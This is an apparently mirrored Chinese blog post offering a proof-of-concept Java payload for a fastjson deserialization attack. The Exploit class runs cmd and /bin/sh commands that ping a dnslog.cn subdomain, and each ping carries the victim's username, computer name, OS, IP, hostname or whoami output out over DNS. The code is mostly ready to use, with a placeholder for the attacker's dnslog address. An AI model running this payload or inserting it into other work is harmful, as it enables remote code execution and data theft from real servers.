zoukankan      html  css  js  c++  java

  • fastjson ping外带信息poc

    public class Exploit {
    public Exploit(){
        String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址
        String win_dnslog = "windows" + base_url;
        // windows
        try{
            String[] commands = { "cmd", "/c", "ping username.%username%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "cmd", "/c", "ping computername.%computername%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "cmd", "/c", "ping os.%os%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        
        
        // linux
        String linux_dnslog = "linux" + base_url;
        try{

            String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/\./,"-"); print $0 }'`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/\./,"-"); print $0 }'`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping hostname.`cat /proc/sys/kernel/hostname`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping user.`whoami`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
    }
    public static void main(String[] args){
        Exploit e = new Exploit();
    }
}
  • 相关阅读:
    Java基础--第二十六天
    Java基础--第二十五天
    Java基础--第二十四天
    Java基础--第二十三天
    Java基础--第二十二天
    Java基础--第二十一天
    Java基础--第二十天
    Java基础--第十九天
    Java基础总结--待续
    docker学习笔记
  • 原文地址:https://www.cnblogs.com/huim/p/12000884.html
Copyright © 2011-2022 走看看